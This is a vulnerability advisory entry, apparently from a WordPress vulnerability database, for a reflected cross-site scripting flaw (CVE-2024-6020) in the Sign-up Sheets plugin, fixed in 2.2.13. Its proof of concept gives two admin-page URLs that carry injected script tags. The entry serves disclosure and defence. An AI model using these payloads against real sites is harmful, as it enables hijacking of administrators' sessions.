Sign-up Sheets < 2.2.13 – Reflected XSS | CVE 2024-6020 | Plugin Vulnerabilities

Description

The plugin does not escape some generated URLs, as well as the $_SERVER['REQUEST_URI'] parameter before outputting them back in attributes, which could lead to Reflected Cross-Site Scripting.

Proof of Concept

Make a logged in admin open the URL below (the sheet id needs to be a valid one with at least one task. Such id is disclosed in the frontend in any sign-up sheet)

https://example.com/wp-admin/edit.php?post_type=dlssus_sheet&page=fdsus-manage&sheet_id=777&"><script>alert(/XSS/)</script>=1

Make a logged in admin open the below URL using web browser which does not encode characters:

https://example.com/wp-admin/edit.php?post_type=dlssus_sheet&page=dlssus-help&cow=b"><script>alert(921)</script>

Affects Plugins

Fixed in 2.2.13

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Bob Matyas

Submitter

Bob Matyas

Submitter website

https://www.bobmatyas.com

Submitter twitter

Verified

Yes

WPVDB ID

f3526320-3abd-4ddb-8f73-778741bd9c48

Timeline

Publicly Published

2024-08-13 (about 1 year ago)

Added

2024-08-13 (about 1 year ago)

Last Updated

2024-08-13 (about 1 year ago)

Other

Published

Title

Published

2012-05-04

Title

Redirection < 2.2.12 - XSS

Published

2024-04-25

Title

OneClick Chat to Order < 1.0.6 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2025-04-01

Title

Ultimate Push Notifications <= 1.2.0 - Reflected Cross-Site Scripting

Published

2024-05-02

Title

Simple Image Popup < 2.5.3 - Admin+ Stored XSS

Published

2023-05-15

Title

WooCommerce Brands < 1.6.46 - Contributor+ Stored XSS